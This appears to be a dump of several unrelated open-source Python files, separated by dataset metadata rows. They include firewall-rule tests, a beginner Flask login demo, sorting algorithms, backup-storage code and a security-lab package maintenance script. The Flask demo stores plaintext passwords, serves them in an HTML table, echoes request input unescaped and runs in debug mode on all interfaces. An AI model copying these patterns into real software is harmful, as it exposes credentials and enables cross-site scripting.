with self.assertRaises(UnsupportedICMPType):
self.iptables_generator._rule_to_iptables_fragments_inner(
"foo", {"icmp_type": 255}, 4, {}, {}
)
def test_bad_protocol_with_ports(self):
with self.assertRaises(AssertionError):
self.iptables_generator._rule_to_iptables_fragments_inner(
"foo", {"protocol": "10", "src_ports": [1]}, 4, {}, {}
)
class TestEndpoint(BaseTestCase):
def setUp(self):
super(TestEndpoint, self).setUp()
self.config = load_config("felix_default.cfg")
self.iptables_generator = self.config.plugins["iptables_generator"]
self.m_iptables_updater = Mock(spec=IptablesUpdater)
def test_endpoint_chain_names(self):
self.assertEqual(
self.iptables_generator.endpoint_chain_names("abcd"),
set(["felix-to-abcd", "felix-from-abcd"]))
def test_get_endpoint_rules(self):
expected_result = (
{
'felix-from-abcd': FROM_ENDPOINT_CHAIN,
'felix-to-abcd': TO_ENDPOINT_CHAIN
},
{
# From chain depends on the outbound profiles.
'felix-from-abcd': set(['felix-p-prof-1-o',
'felix-p-prof-2-o',
'felix-p-t1p1-o',
'felix-p-t1p2-o',
'felix-p-t2p1-o',]),
# To chain depends on the inbound profiles.
'felix-to-abcd': set(['felix-p-prof-1-i',
'felix-p-prof-2-i',
'felix-p-t1p1-i',
'felix-p-t1p2-i',
'felix-p-t2p1-i',])
}
)
tiered_policies = OrderedDict()
tiered_policies["tier_1"] = ["t1p1", "t1p2"]
tiered_policies["tier_2"] = ["t2p1"]
result = self.iptables_generator.endpoint_updates(4, "e1", "abcd",
"aa:22:33:44:55:66",
["prof-1", "prof-2"],
tiered_policies)
# Log the whole diff if the comparison fails.
self.maxDiff = None
self.assertEqual(result, expected_result)
| apache-2.0 | -435,367,150,946,990,660 | 39.4 | 110 | 0.507983 | false |
seerjk/reboot06 | 06/homework/demo1.py | 1 | 2785 | # coding:utf-8
from flask import Flask, request, render_template
app = Flask(__name__)
@app.route('/login')
def index():
# return "<h1>hello world</h1>"
# return '<input type="button" value="click me">'
# default dir: ./templates
return render_template("login.html")
@app.route('/reboot')
def reboot():
return "<h1>hello, reboot</h1>"
@app.route('/test1')
def test1():
age = request.args.get('age')
print age
return "<h2>ages: %s</h2>" % age
@app.route('/test_form')
def test_form():
name = request.args.get('name')
passwd = request.args.get('passwd')
res = ""
if name == "jiangk":
if passwd == "12345":
res = "Welcome %s" % name
else:
res = "passord wrong."
else:
res = "%s doesn't exist." % name
return res
#
try:
with open('user.txt') as f:
lines = f.readlines()
except Exception, e:
print "Error"
exit(-1)
user_dict = {}
for line in lines:
line = line.strip().split(' ')
user_dict[line[0]] = line[1]
@app.route('/test_user_file')
def test_user_file():
global user_dict
name = request.args.get('name')
passwd = request.args.get('passwd')
res = ""
if name in user_dict:
if passwd == user_dict[name]:
res = "Welcome %s" % name
else:
res = "passord wrong."
else:
res = "%s doesn't exist." % name
return res
@app.route('/table1')
def table1():
return render_template("table1.html")
@app.route('/print_table')
def print_table():
res = '''
<table border="1">
<thead>
<tr>
<th>name</th>
<th>passwd</th>
</tr>
</thead>
<tbody>
'''
for name, pwd in user_dict.items():
res += '''
<tr>
<td>%s</td>
<td>%s</td>
</tr>
''' % (name, pwd)
res += '''
</tbody>
</table>
'''
return res
@app.route('/user_table')
def user_table():
res = '''
<table border="1">
<thead>
<tr>
<th>姓名</th>
<th>密码</th>
<th>操作</th>
</tr>
</thead>
<tbody>
'''
for name, pwd in user_dict.items():
res += '''
<tr>
<td>%s</td>
<td>%s</td>
</tr>
''' % (name, pwd)
res += '''
</tbody>
</table>
'''
return res
@app.route('/test_args')
def test_args():
name = request.args.get('name')
print "len: %d, name: (%s), type: %s" %( len(name), name, type(name))
return "len: %d, name: (%s), type: %s" %( len(name), name, type(name))
if __name__ == "__main__":
app.run(host="0.0.0.0", port=9002, debug=True)
| mit | 8,115,482,448,132,503,000 | 19.094203 | 74 | 0.475298 | false |
yochow/autotest | utils/coverage_suite.py | 1 | 1761 | #!/usr/bin/python
import os, sys
import unittest_suite
import common
from autotest_lib.client.common_lib import utils
root = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
def is_valid_directory(dirpath):
if dirpath.find('client/tests') >= 0:
return False
elif dirpath.find('client/site_tests') >= 0:
return False
elif dirpath.find('tko/migrations') >= 0:
return False
elif dirpath.find('server/tests') >= 0:
return False
elif dirpath.find('server/site_tests') >= 0:
return False
else:
return True
def is_valid_filename(f):
# has to be a .py file
if not f.endswith('.py'):
return False
# but there are execptions
if f.endswith('_unittest.py'):
return False
elif f == '__init__.py':
return False
elif f == 'common.py':
return False
else:
return True
def main():
coverage = os.path.join(root, "contrib/coverage.py")
unittest_suite = os.path.join(root, "unittest_suite.py")
# remove preceeding coverage data
cmd = "%s -e" % (coverage)
utils.system_output(cmd)
# run unittest_suite through coverage analysis
cmd = "%s -x %s" % (coverage, unittest_suite)
utils.system_output(cmd)
# now walk through directory grabbing lits of files
module_strings = []
for dirpath, dirnames, files in os.walk(root):
if is_valid_directory(dirpath):
for f in files:
if is_valid_filename(f):
temp = os.path.join(dirpath, f)
module_strings.append(temp)
# analyze files
cmd = "%s -r -m %s" % (coverage, " ".join(module_strings))
utils.system(cmd)
if __name__ == "__main__":
main()
| gpl-2.0 | 2,078,749,227,466,979,800 | 24.521739 | 69 | 0.593981 | false |
davek44/Basset | src/dev/basset_conv2_infl.py | 1 | 5417 | #!/usr/bin/env python
from optparse import OptionParser
import os
import random
import subprocess
import h5py
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
################################################################################
# basset_conv2_infl.py
#
# Visualize the 2nd convolution layer of a CNN.
################################################################################
################################################################################
# main
################################################################################
def main():
usage = 'usage: %prog [options] <model_file> <test_hdf5_file>'
parser = OptionParser(usage)
parser.add_option('-d', dest='model_hdf5_file', default=None, help='Pre-computed model output as HDF5.')
parser.add_option('-o', dest='out_dir', default='.')
parser.add_option('-s', dest='sample', default=None, type='int', help='Sample sequences from the test set [Default:%default]')
(options,args) = parser.parse_args()
if len(args) != 2:
parser.error('Must provide Basset model file and test data in HDF5 format.')
else:
model_file = args[0]
test_hdf5_file = args[1]
if not os.path.isdir(options.out_dir):
os.mkdir(options.out_dir)
#################################################################
# load data
#################################################################
# load sequences
test_hdf5_in = h5py.File(test_hdf5_file, 'r')
seq_vecs = np.array(test_hdf5_in['test_in'])
seq_targets = np.array(test_hdf5_in['test_out'])
target_labels = list(test_hdf5_in['target_labels'])
test_hdf5_in.close()
#################################################################
# sample
#################################################################
if options.sample is not None:
# choose sampled indexes
sample_i = np.array(random.sample(xrange(seq_vecs.shape[0]), options.sample))
# filter
seq_vecs = seq_vecs[sample_i]
seq_targets = seq_targets[sample_i]
# create a new HDF5 file
sample_hdf5_file = '%s/sample.h5' % options.out_dir
sample_hdf5_out = h5py.File(sample_hdf5_file, 'w')
sample_hdf5_out.create_dataset('test_in', data=seq_vecs)
sample_hdf5_out.create_dataset('test_out', data=seq_targets)
sample_hdf5_out.close()
# update test HDF5
test_hdf5_file = sample_hdf5_file
#################################################################
# Torch predict
#################################################################
if options.model_hdf5_file is None:
options.model_hdf5_file = '%s/model_out.h5' % options.out_dir
# TEMP
torch_cmd = './basset_convs_infl.lua -layer 2 %s %s %s' % (model_file, test_hdf5_file, options.model_hdf5_file)
print torch_cmd
subprocess.call(torch_cmd, shell=True)
# load model output
model_hdf5_in = h5py.File(options.model_hdf5_file, 'r')
filter_means = np.array(model_hdf5_in['filter_means'])
filter_stds = np.array(model_hdf5_in['filter_stds'])
filter_infl = np.array(model_hdf5_in['filter_infl'])
filter_infl_targets = np.array(model_hdf5_in['filter_infl_targets'])
model_hdf5_in.close()
# store useful variables
num_filters = filter_means.shape[0]
num_targets = filter_infl_targets.shape[1]
#############################################################
# print filter influence table
#############################################################
# loss change table
table_out = open('%s/table_loss.txt' % options.out_dir, 'w')
for fi in range(num_filters):
cols = (fi, filter_infl[fi], filter_means[fi], filter_stds[fi])
print >> table_out, '%3d %7.4f %6.4f %6.3f' % cols
table_out.close()
# target change table
table_out = open('%s/table_target.txt' % options.out_dir, 'w')
for fi in range(num_filters):
for ti in range(num_targets):
cols = (fi, ti, target_labels[ti], filter_infl_targets[fi,ti])
print >> table_out, '%-3d %3d %20s %7.4f' % cols
table_out.close()
def plot_filter_heat(weight_matrix, out_pdf):
''' Plot a heatmap of the filter's parameters.
Args
weight_matrix: np.array of the filter's parameter matrix
out_pdf
'''
weight_range = abs(weight_matrix).max()
sns.set(font_scale=0.8)
plt.figure(figsize=(2,12))
sns.heatmap(weight_matrix, cmap='PRGn', linewidths=0.05, vmin=-weight_range, vmax=weight_range, yticklabels=False)
ax = plt.gca()
ax.set_xticklabels(range(1,weight_matrix.shape[1]+1))
plt.tight_layout()
plt.savefig(out_pdf)
plt.close()
def plot_output_density(f_outputs, out_pdf):
''' Plot the output density and compute stats.
Args
f_outputs: np.array of the filter's outputs
out_pdf
'''
sns.set(font_scale=1.3)
plt.figure()
sns.distplot(f_outputs, kde=False)
plt.xlabel('ReLU output')
plt.savefig(out_pdf)
plt.close()
return f_outputs.mean(), f_outputs.std()
################################################################################
# __main__
################################################################################
if __name__ == '__main__':
main()
#pdb.runcall(main)
| mit | -1,388,347,831,177,522,000 | 34.405229 | 130 | 0.510061 | false |
KingSpork/sporklib | algorithms/search_and_sort_algorithms.py | 1 | 2377 | import random
'''Binary Search'''
def binarySearch(someList, target):
lo = 0
hi = len(someList)
while lo+1 < hi:
test = (lo + hi) / 2
if someList[test] > target:
hi = test
else:
lo = test
if someList[lo] == target:
return lo
else:
return -1
'''Find duplicates in array/list'''
def findDupes(someList):
dupes = []
hashTable = {}
uniques = set(someList)
if len(uniques) != len(someList):
for item in someList:
if hashTable.has_key(item) == True:
dupes.append(item)
else:
hashTable[item] = 0
return dupes
'''QuickSort, f yeah'''
def quickSort(someList):
listSize = len(someList) #get the length of the list
if len(someList) == 0: #if the list is empty...
return [] #...return an empty list
#ok, it gets real
less = [] #make an empty list for less
greater = [] #make an empty liss for greater
pivot = someList.pop(random.randint(0, listSize-1))
for element in someList:
if element <= pivot:
less.append(element)
else:
greater.append(element)
retList = quickSort(less) + [pivot] + quickSort(greater)
#print("Return list:");print(retList)
return retList
''' Heap Sort '''
def swap(someList, i, j):
someList[i], someList[j] = someList[j], someList[i]
def heapify(someList):
length = len(someList)
start = (length - 1) / 2
while start >= 0:
siftDown(someList, start, length-1)
start = start - 1
def siftDown(someList, start, end):
root = start #integers for indexes, remember
while (root * 2 + 1) <= end: #while root has at least one child
child = root * 2 + 1
swapper = root
if someList[swapper] < someList[child]:
swapper = child
if child+1 <= end and someList[swapper] < someList[child+1]:
swapper = child + 1
if swapper != root:
print("root: " + str(root) + " swapper: " + str(swapper))
try:
print("values: " + str(someList[root]) + " , " + str(someList[swapper]))
except:
print("Root or swapper out of range")
swap(someList, root, swapper)
root = swapper
else:
return
def heapSort(someList):
end = len(someList) -1
heapify(someList)
while end > 0:
swap(someList, end, 0)
end = end - 1
siftDown(someList, 0, end)
def isEqual(int1, int2, int3):
if int1 == int2 == int3:
return True
else:
return False | unlicense | 1,480,981,274,070,060,800 | 21.554455 | 76 | 0.611695 | false |
obnam-mirror/obnam | obnamlib/fmt_ga/leaf_store.py | 1 | 2653 | # Copyright 2016-2017 Lars Wirzenius
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# =*= License: GPL-3+ =*=
import tracing
import obnamlib
class LeafStoreInterface(object): # pragma: no cover
def put_leaf(self, leaf):
raise NotImplementedError()
def get_leaf(self, leaf_id):
raise NotImplementedError()
def remove_leaf(self, leaf_id):
raise NotImplementedError()
def flush(self):
raise NotImplementedError()
class InMemoryLeafStore(LeafStoreInterface):
def __init__(self):
self._leaves = {}
self._counter = 0
def put_leaf(self, leaf):
self._counter += 1
self._leaves[self._counter] = leaf
return self._counter
def get_leaf(self, leaf_id):
return self._leaves.get(leaf_id, None)
def remove_leaf(self, leaf_id):
if leaf_id in self._leaves:
del self._leaves[leaf_id]
def flush(self):
pass
class LeafStore(LeafStoreInterface): # pragma: no cover
def __init__(self):
self._blob_store = None
def set_blob_store(self, blob_store):
self._blob_store = blob_store
def put_leaf(self, leaf):
leaf_id = self._blob_store.put_blob(leaf.as_dict())
tracing.trace('new leaf %s', leaf_id)
return leaf_id
def get_leaf(self, leaf_id):
tracing.trace('leaf_id %s', leaf_id)
blob = self._blob_store.get_blob(leaf_id)
if blob is None:
tracing.trace('no blob for leaf %r', leaf_id)
return None
tracing.trace('got blob for leaf %r', leaf_id)
leaf = obnamlib.CowLeaf()
leaf.from_dict(self._blob_store.get_blob(leaf_id))
return leaf
def remove_leaf(self, leaf_id):
tracing.trace('leaf_id %s', leaf_id)
# FIXME: This is a bit ugly, since we need to break the
# bag/blob store abstraction.
bag_id, _ = obnamlib.parse_object_id(leaf_id)
self._blob_store._bag_store.remove_bag(bag_id)
def flush(self):
self._blob_store.flush()
| gpl-3.0 | 48,278,622,617,393,850 | 26.635417 | 71 | 0.636638 | false |
fabaff/fsl | fsl-maintenance.py | 1 | 7450 | #!/usr/bin/env python3
#
# fsl-maintenance - A helper script to maintain the Security Lab package list
# and other relevant maintenance tasks.
#
# Copyright (c) 2012-2019 Fabian Affolter <[email protected]>
#
# All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# Credits goes to Robert Scheck. He did a lot brain work for the initial
# approach. This script is heavy based on his Perl scripts.
import argparse
import operator
import itertools
import datetime
import re
import sys
import os
try:
import columnize
except ImportError:
print("Please install pycolumnize first -> sudo dnf -y install python3-columnize")
import dnf
try:
import git
except ImportError:
print("Please install GitPython first -> sudo dnf -y install python3-GitPython")
try:
import yaml
except ImportError:
print("Please install PyYAML first -> sudo dnf -y install PyYAML")
try:
import click
except ImportError:
print("Please install click first -> sudo dnf -y install python3-click")
DEFAULT_FILENAME = 'pkglist.yaml'
repo = git.Repo(os.getcwd())
def getPackages():
"""Read YAML package file and return all packages."""
file = open(DEFAULT_FILENAME, 'r')
pkgslist = yaml.safe_load(file)
file.close()
return pkgslist
@click.group()
@click.version_option()
def cli():
"""fsl-maintenance
This tool can be used for maintaining the Fedora Security Lab package list.
"""
@cli.group()
def display():
"""Display the details about the packages."""
@display.command('full')
def full():
"""All included tools and details will be printed to STDOUT."""
pkgslist = getPackages()
pkgslistIn = []
pkgslistEx = []
pkgslistAll = []
# All packages
pkgslistAll = []
for pkg in pkgslist:
pkgslistAll.append(pkg['pkg'])
# Split list of packages into included and excluded packages
# Not used at the moment
#for pkg in pkgslist:
# if 'exclude' in pkg:
# pkgslistEx.append(pkg['pkg'])
# else:
# pkgslistIn.append(pkg['pkg'])
# Displays the details to STDOUT
print("\nDetails about the packages in the Fedora Security Lab.\n")
print("Packages in comps : ", len(pkgslist))
#print("Packages included in live media : ", len(pkgslistIn))
print("\nPackage listing:")
sorted_pkgslist = sorted(pkgslistAll)
print(columnize.columnize(sorted_pkgslist, displaywidth=72))
@display.command('raw')
def raw():
"""The pkglist.yaml file will be printed to STDOUT."""
pkgslist = getPackages()
print(yaml.dump(pkgslist))
@display.command('short')
def short():
"""Only show the absolute minimum about the package list."""
pkgslist = getPackages()
# Displays the details to STDOUT
print("\nDetails about the packages in the Fedora Security Lab\n")
print("Packages in comps : ", len(pkgslist))
print("\nTo see all available options use -h or --help.")
@cli.group()
def output():
"""Create various output from the package list."""
@output.command('comps')
def comps():
"""
Generates the entries to include into the comps-fXX.xml.in file.
<packagelist>
...
</packagelist>
"""
pkgslist = getPackages()
# Split list of packages into eincluded and excluded packages
sorted_pkgslist = sorted(pkgslist, key=operator.itemgetter('pkg'))
for pkg in sorted_pkgslist:
entry = ' <packagereq type="default">{}</packagereq>'.format(pkg['pkg'])
print(entry)
@output.command('playbook')
def playbook():
"""Generate an Ansible playbook for the installation."""
pkgslist = getPackages()
part1 = """# This playbook installs all Fedora Security Lab packages.
#
# Copyright (c) 2013-2018 Fabian Affolter <[email protected]>
#
# All rights reserved.
# This file is licensed under GPLv2, for more details check COPYING.
#
# Generated by fsl-maintenance.py at %s
#
# Usage: ansible-playbook fsl-packages.yml -f 10
---
- hosts: fsl_hosts
user: root
tasks:
- name: install all packages from the FSL
dnf: pkg={{ item }}
state=present
with_items:\n""" % (datetime.date.today())
# Split list of packages into included and excluded packages
sorted_pkgslist = sorted(pkgslist, key=operator.itemgetter('pkg'))
# Write the playbook files
fileOut = open('ansible-playbooks/fsl-packages.yml', 'w')
fileOut.write(part1)
for pkg in sorted_pkgslist:
fileOut.write(' - %s\n' % pkg['pkg'])
fileOut.close()
# Commit the changed file to the repository
repo.git.add('ansible-playbooks/fsl-packages.yml')
repo.git.commit(m='Update playbook')
repo.git.push()
@output.command('live')
def live():
"""Generate the exclude list for the kickstart file."""
pkgslist = getPackages()
# Split list of packages into included and excluded packages
sorted_pkgslist = sorted(pkgslist, key=operator.itemgetter('pkg'))
for pkg in sorted_pkgslist:
if pkg['exclude'] == 1:
print("- ", pkg['pkg'])
@output.command('menus')
def menus():
"""Generate the .desktop files which are used for the menu structure."""
pkgslist = getPackages()
# Terminal is the standard terminal application of the Xfce desktop
terminal = 'xfce4-terminal'
# Collects all files in the directory
filelist = []
os.chdir('security-menu')
for files in os.listdir("."):
if files.endswith(".desktop"):
filelist.append(files)
# Write the .desktop files
for pkg in pkgslist:
if 'command' and 'name' in pkg:
file_out = open('security-{}.desktop'.format(pkg['pkg']), 'w')
file_out.write('[Desktop Entry]\n')
file_out.write('Name={}\n'.format(pkg['name']))
file_out.write("Exec={} -e \"su -c '{}; bash'\"\n".format(
terminal, pkg['command']))
file_out.write('TryExec={}\n'.format(pkg['pkg']))
file_out.write('Type=Application\n')
file_out.write('Categories=System;Security;X-SecurityLab;'
'X-{};\n'.format(pkg['category']))
file_out.close()
# Compare the needed .desktop file against the included packages, remove
# .desktop files from exclude packages
dellist = filelist
for pkg in pkgslist:
if 'command' in pkg:
dellist.remove('security-{}.desktop'.format(pkg['pkg']))
if 'exclude' in pkg:
if pkg['exclude'] == 1:
dellist.append('security-{}.desktop'.format(pkg['pkg']))
# Remove the .desktop files which are no longer needed
if len(dellist) != 0:
for file in dellist:
os.remove(file)
if __name__ == '__main__':
cli()
| gpl-2.0 | -920,566,221,492,696,600 | 29.658436 | 86 | 0.654497 | false |
hyt-hz/mediautils | mediautils/mp4/parser.py | 1 | 9133 | import struct
import traceback
import logging
class FileCache(object):
def __init__(self, file_obj, cache_size=0x0FFF):
self._file = file_obj
self._cache = None
self._cache_read_size = cache_size
self._cache_offset = 0
self.offset = 0
def read_from(self, start_offset, size, move=True):
if self._cache is None \
or start_offset >= self._cache_offset + self._cache_size \
or start_offset < self._cache_offset:
self._read2cache(start_offset)
if self._cache_size == 0:
return ''
if start_offset + size <= self._cache_offset + self._cache_size:
if move:
self.offset = start_offset + size
return self._cache[(start_offset-self._cache_offset):(start_offset+size-self._cache_offset)]
else:
data = self._cache[(start_offset-self._cache_offset):]
self._read2cache()
if self._cache_size == 0:
return ''
while True:
if start_offset + size <= self._cache_offset + self._cache_size:
if move:
self.offset = start_offset + size
return data + self._cache[(start_offset-self._cache_offset):(start_offset+size-self._cache_offset)]
else:
data += self._cache[(start_offset-self._cache_offset):]
self._read2cache()
if self._cache_size == 0:
return data
def read(self, size):
return self.read_from(self.offset, size)
def peek(self, size):
return self.read_from(self.offset, size, move=False)
def seek(self, offset):
self._file.seek(offset)
self.offset = offset
def tell(self):
return self.offset
def forward(self, size):
self.offset += size
def backward(self, size):
if self.offset <= size:
self.offset = 0
else:
self.offset -= size
def _read2cache(self, offset=None):
if offset is None:
# continue
self._cache_offset += self._cache_size
self._cache = self._file.read(self._cache_read_size)
else:
self._file.seek(offset)
self._cache = self._file.read(self._cache_read_size)
self._cache_offset = offset
@property
def _cache_size(self):
if self._cache:
return len(self._cache)
return 0
class BoxMetaClass(type):
def __init__(cls, name, bases, dct):
if hasattr(cls, 'boxtype'):
cls.box_classes[cls.boxtype] = cls
super(BoxMetaClass, cls).__init__(name, bases, dct)
class Box(object):
box_classes = {} # key value pair of box type name and corresponding subclass
# filled by metaclass
__metaclass__ = BoxMetaClass
direct_children = False
def __init__(self, data, parent):
self.box_offset = data.tell()
self.parent = parent
self.size, = struct.unpack('>I', data.read(4))
self.type = data.read(4)
self.next = None
self.children = []
if self.size == 1:
# 64-bit size
self.size, = struct.unpack('>Q', data.read(8))
elif self.size == 0:
# to the end of file
pass
else:
pass
self.body_offset = data.tell()
self._parse(data)
def _parse(self, data):
if self.direct_children:
self._parse_child(data)
else:
data.seek(self.box_offset+self.size)
def _parse_child(self, data):
while True:
if self.parent and self.parent.end_offset and data.tell() >= self.parent.end_offset:
return
if self.end_offset and data.tell() >= self.end_offset:
return
try:
child = Box.factory(data, self)
except Exception:
print traceback.format_exc()
return
if child:
self.children.append(child)
else:
return
def iter_child(self, deep=False):
for child in self.children:
yield child
if deep:
for box in child.iter_child(deep=True):
yield box
@property
def end_offset(self):
if self.size:
return self.box_offset + self.size
else:
return 0
def find_children(self, box_type, deep=False, only_first=False):
children = []
for child in self.iter_child(deep=deep):
if child.type == box_type:
if only_first:
return child
else:
children.append(child)
return children
@classmethod
def factory(cls, data, parent):
boxtype = data.peek(8)[4:8]
if len(boxtype) == 0:
return None
if boxtype in cls.box_classes:
return cls.box_classes[boxtype](data, parent)
else:
return cls(data, parent)
class BoxRoot(Box):
boxtype = 'ROOT'
direct_children = True
def __init__(self, data):
self.box_offset = data.tell()
self.body_offset = self.box_offset
self.parent = None
self.size = 0
self.type = self.boxtype
self.children = []
self._parse(data)
class BoxMoov(Box):
boxtype = 'moov'
def _parse(self, data):
self._parse_child(data)
class BoxTrak(Box):
boxtype = 'trak'
direct_children = True
class BoxMdia(Box):
boxtype = 'mdia'
direct_children = True
class BoxMdhd(Box):
boxtype = 'mdhd'
def _parse(self, data):
self.version, = struct.unpack('>B', data.read(1))
self.flag = data.read(3)
if self.version == 0:
self.creation_time, = struct.unpack('>I', data.read(4))
self.modification_time, = struct.unpack('>I', data.read(4))
self.timescale, = struct.unpack('>I', data.read(4))
self.duration, = struct.unpack('>I', data.read(4))
else:
self.creation_time, = struct.unpack('>Q', data.read(8))
self.modification_time, = struct.unpack('>Q', data.read(8))
self.timescale, = struct.unpack('>I', data.read(4))
self.duration, = struct.unpack('>Q', data.read(8))
data.forward(4)
class BoxMinf(Box):
boxtype = 'minf'
direct_children = True
class BoxStbl(Box):
boxtype = 'stbl'
direct_children = True
class BoxStts(Box):
boxtype = 'stts'
def _parse(self, data):
self.version = data.read(1)
self.flag = data.read(3)
self.entry_count, = struct.unpack('>I', data.read(4))
self._entries = data.read(self.entry_count*8)
def iter_time_to_sample(self):
offset = 0
end_offset = self.entry_count*8
while offset + 8 <= end_offset:
yield struct.unpack('>I', self._entries[offset:offset+4])[0], struct.unpack('>I', self._entries[offset+4:offset+8])[0]
offset += 8
def sample_time(self, sample):
accum_samples = 0
accum_time = 0
for sample_count, sample_delta in self.iter_time_to_sample():
if sample < accum_samples + sample_count:
return accum_time + (sample - accum_samples)*sample_delta
accum_samples += sample_count
accum_time += sample_count*sample_delta
class BoxStss(Box):
# return sample starts from 0 instead of from 1
boxtype = 'stss'
def _parse(self, data):
self.version = data.read(1)
self.flag = data.read(3)
self.entry_count, = struct.unpack('>I', data.read(4))
self._entries = data.read(self.entry_count*4)
def sync_sample(self, index):
if index+1 > self.entry_count:
raise Exception('stss index {} too large'.format(index))
return struct.unpack('>I', self._entries[index*4:index*4+4])[0] - 1
def iter_sync_sample(self):
offset = 0
end_offset = self.entry_count*4
while offset + 4 <= end_offset:
yield struct.unpack('>I', self._entries[offset:offset+4])[0] - 1
offset += 4
if __name__ == '__main__':
def print_all_children(box, prefix=''):
for child in box.iter_child():
print prefix, child.type
print_all_children(child, prefix+' ')
with open('ted.mp4', 'rb') as f:
data = FileCache(f)
mp4 = BoxRoot(data)
print_all_children(mp4)
print '\nstss data:'
for trak in mp4.find_children('trak', deep=True):
stts = trak.find_children('stts', deep=True, only_first=True)
stss = trak.find_children('stss', deep=True, only_first=True)
mdhd = trak.find_children('mdhd', deep=True, only_first=True)
if stts and stss:
for sync_sample in stss.iter_sync_sample():
print sync_sample, stts.sample_time(sync_sample), float(stts.sample_time(sync_sample))/mdhd.timescale
| gpl-3.0 | -415,757,000,598,475,300 | 29.241722 | 130 | 0.545604 | false |
Shuailong/Leetcode | solutions/bulb-switcher.py | 1 | 1128 | #!/usr/bin/env python
# encoding: utf-8
"""
bulb-switcher.py
Created by Shuailong on 2015-12-19.
https://leetcode.com/problems/bulb-switcher.
"""
'''key: find the law and rewrite the solution'''
from math import floor,sqrt
class Solution1(object):
'''Too time consuming'''
def factors(self,n):
'''
How many factors does the integer n have?
'''
if n == 1:
return 1
count = 0
for i in range(2, n):
if n % i == 0:
count += 1
return count+2
def bulbSwitch(self, n):
"""
:type n: int
:rtype: int
"""
count = 0
for i in range(1, n+1):
if self.factors(i) % 2 == 1:
count += 1
return count
class Solution(object):
def bulbSwitch(self,n):
"""
:type n: int
:rtype: int
"""
return int(floor(sqrt(n)))
def main():
solution = Solution()
solution1 = Solution1()
for n in range(1,20):
print n, solution.bulbSwitch(n)
if __name__ == '__main__':
main()
| mit | -5,968,391,800,125,050,000 | 16.369231 | 49 | 0.489362 | false |
kif/UPBL09a | dahu/plugin.py | 1 | 5115 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
"""
Data Analysis Highly tailored fror Upbl09a
"""
from __future__ import with_statement, print_function, absolute_import, division
__authors__ = ["Jérôme Kieffer"]
__contact__ = "[email protected]"
__license__ = "MIT"
__copyright__ = "European Synchrotron Radiation Facility, Grenoble, France"
__date__ = "31/10/2018"
__status__ = "production"
from .factory import plugin_factory, register
from .utils import fully_qualified_name, get_workdir
import os
import logging
import cProfile
logger = logging.getLogger("dahu.plugin")
class Plugin(object):
"""
A plugin is instanciated
* Gets its input parameters as a dictionary from the setup method
* Performs some work in the process
* Sets the result as output attribute, should be a dictionary
* The process can be an infinite loop or a server which can be aborted using the abort method
"""
DEFAULT_SET_UP = "setup" # name of the method used to set-up the plugin (close connection, files)
DEFAULT_PROCESS = "process" # specify how to run the default processing
DEFAULT_TEAR_DOWN = "teardown" # name of the method used to tear-down the plugin (close connection, files)
DEFAULT_ABORT = "abort" # name of the method used to abort the plugin (if any. Tear_Down will be called)
def __init__(self):
"""
We assume an empty constructor
"""
self.input = {}
self.output = {}
self._logging = [] # stores the logging information to send back
self.is_aborted = False
self.__profiler = None
def get_name(self):
return self.__class__.__name__
def setup(self, kwargs=None):
"""
This is the second constructor to setup
input variables and possibly initialize
some objects
"""
if kwargs is not None:
self.input.update(kwargs)
if self.input.get("do_profiling"):
self.__profiler = cProfile.Profile()
self.__profiler.enable()
def process(self):
"""
main processing of the plugin
"""
pass
def teardown(self):
"""
method used to tear-down the plugin (close connection, files)
This is always run, even if process fails
"""
self.output["logging"] = self._logging
if self.input.get("do_profiling"):
self.__profiler.disable()
name = "%05i_%s.%s.profile" % (self.input.get("job_id", 0), self.__class__.__module__, self.__class__.__name__)
profile_file = os.path.join(get_workdir(), name)
self.log_error("Profiling information in %s" % profile_file, do_raise=False)
self.__profiler.dump_stats(profile_file)
def get_info(self):
"""
"""
return os.linesep.join(self._logging)
def abort(self):
"""
Method called to stop a server process
"""
self.is_aborted = True
def log_error(self, txt, do_raise=True):
"""
Way to log errors and raise error
"""
if do_raise:
err = "ERROR in %s: %s" % (self.get_name(), txt)
logger.error(err)
else:
err = "Warning in %s: %s" % (self.get_name(), txt)
logger.warning(err)
self._logging.append(err)
if do_raise:
raise RuntimeError(err)
def log_warning(self, txt):
"""
Way to log warning
"""
err = "Warning in %s: %s" % (self.get_name(), txt)
logger.warning(err)
self._logging.append(err)
class PluginFromFunction(Plugin):
"""
Template class to build a plugin from a function
"""
def __init__(self):
"""
:param funct: function to be wrapped
"""
Plugin.__init__(self)
def __call__(self, **kwargs):
"""
Behaves like a normal function: for debugging
"""
self.input.update(kwargs)
self.process()
self.teardown()
return self.output["result"]
def process(self):
if self.input is None:
print("PluginFromFunction.process: self.input is None !!! %s", self.input)
else:
funct_input = self.input.copy()
if "job_id" in funct_input:
funct_input.pop("job_id")
if "plugin_name" in funct_input:
funct_input.pop("plugin_name")
self.output["result"] = self.function(**funct_input)
def plugin_from_function(function):
"""
Create a plugin class from a given function and registers it into the
:param function: any function
:return: plugin name to be used by the plugin_factory to get an instance
"""
logger.debug("creating plugin from function %s" % function.__name__)
class_name = function.__module__ + "." + function.__name__
klass = type(class_name, (PluginFromFunction,),
{'function': staticmethod(function),
"__doc__": function.__doc__})
plugin_factory.register(klass, class_name)
return class_name
| gpl-2.0 | -6,533,337,136,667,705,000 | 29.987879 | 123 | 0.584588 | false |
loopback1/scripts | code/python/exscript_asa_config.py | 1 | 1247 | #!/usr/bin/env python
import Exscript.util.file as euf
import Exscript.util.start as eus
import Exscript.util.match as eum
# import Exscript.protocols.drivers
